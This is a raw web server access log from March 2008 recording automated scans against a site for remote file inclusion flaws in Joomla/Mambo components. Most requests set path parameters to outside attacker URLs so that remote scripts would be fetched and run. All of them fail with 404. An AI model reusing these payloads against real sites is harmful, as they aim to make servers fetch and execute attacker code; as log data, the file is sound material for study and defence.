69.93.48.162 - - [16/Mar/2008:19:12:06 -0700] "GET /logs/access_070924.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:19:12:06 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:19:12:06 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:19:12:07 -0700] "GET /logs/access_071022.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:19:12:07 -0700] "GET /component/forum/index.php?action=recent;start=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:19:12:07 -0700] "GET /logs/component/forum/index.php?action=recent;start=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:19:12:15 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
87.118.102.153 - - [16/Mar/2008:19:12:34 -0700] "GET /index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
87.118.102.153 - - [16/Mar/2008:19:12:34 -0700] "GET /logs/index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
84.14.51.216 - - [16/Mar/2008:19:13:00 -0700] "GET /index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
84.14.51.216 - - [16/Mar/2008:19:13:00 -0700] "GET /logs/index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
80.55.150.108 - - [16/Mar/2008:19:13:54 -0700] "GET /logs/access_071231.log//components/com_simpleboard/file_upload.php?sbp=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.228.60.242 - - [16/Mar/2008:19:13:59 -0700] "GET /index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
67.228.60.242 - - [16/Mar/2008:19:13:59 -0700] "GET /logs/index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
72.30.216.60 - - [16/Mar/2008:19:14:25 -0700] "GET /logs/access.log HTTP/1.0" 200 129406 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:19:14:43 -0700] "GET /logs/access_070827.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:19:14:45 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:19:14:57 -0700] "GET /logs/access_071217.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:19:15:26 -0700] "GET /logs/access_071231.log/template.php?pagina=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:19:15:26 -0700] "GET /template.php?pagina=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-"